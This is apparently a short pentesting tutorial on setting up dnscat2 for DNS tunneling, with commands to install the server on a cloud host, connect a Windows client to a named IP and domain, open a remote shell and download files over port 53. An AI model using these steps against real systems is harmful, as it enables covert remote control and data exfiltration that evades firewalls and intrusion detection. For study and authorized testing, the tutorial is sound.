DNS Tunneling with dnscat2

One of the challenges of a pentester is to communicate through firewalls and IDS from inside a system. DNS Tunneling is a very effective technique for overcoming this kind of protection mechanisms. Dnscat2 is a very popular tool for DNS Tunneling.

You can install your dnscat2 server on your own machine or on a machine in the cloud. You can hire a virtual server on Digital Ocean and create an Ubuntu droplet there (You’ll receive root password for your droplet machine over e-mail). After that you can connect your machine over ssh.

To install dnscat2 server there run the following commands:


# apt-get update
# apt-get -y install ruby-dev git make g++
# gem install bundler
# git clone https://github.com/iagox86/dnscat2.git
# cd dnscat2/server
# bundle install

If you’ll face problems when running the command “bundle install” run the following commands and then install the missing libraries.

gem install rubygems-update

update_rubygems

On client machine (here Windows client) you can install the dnscat2 client (dnscat2-v0.05-client-win32.zip) from the developer’s website.

Now, you can start dnscat2 server with the following command:

ruby ./dnscat2.rb

After that, when you execute your dnscat2.exe on your Windows machine with the following command;

dnscat2.exe –dns server=46.101.174.185,port=53

then you’ll get a shell. Just type:

session -i 1

exec calc.exe

You’ll get calculator.exe running on Windows machine. And all this TCP traffic is encapsulated within UDP 53 traffic.

A better way of running dnscat2 server is defining a legitimate domain name with the IP address of dnscat2 as its authoritive name server. For this purpose I used makarillo.com and defined 46.101.174.185 IP address as its name server.

After that it is possible to run dnscat2 server with this domain name as parameter:

ruby ./dnscat2.rb makarillo.com,server=8.8.8.8,port=53

Now, all you have to do on client side is again running the tool with the same domain name:

dnscat2.exe makarillo.com

You’ll have now have a command shell over the client machine. You can see what is inside that directory and then download the files as you wish:

dnscat2 session -i 1

command (Lab) 1>exec “cmd /c dir>output.txt”

command (Lab) 1>download output.txt

Below you can see snapshots of both the server and client side of the dnscat2 tool running:

First client side:

dnscat

And server side running:

dnscat running on server

Keep on digging the rabbit hole :)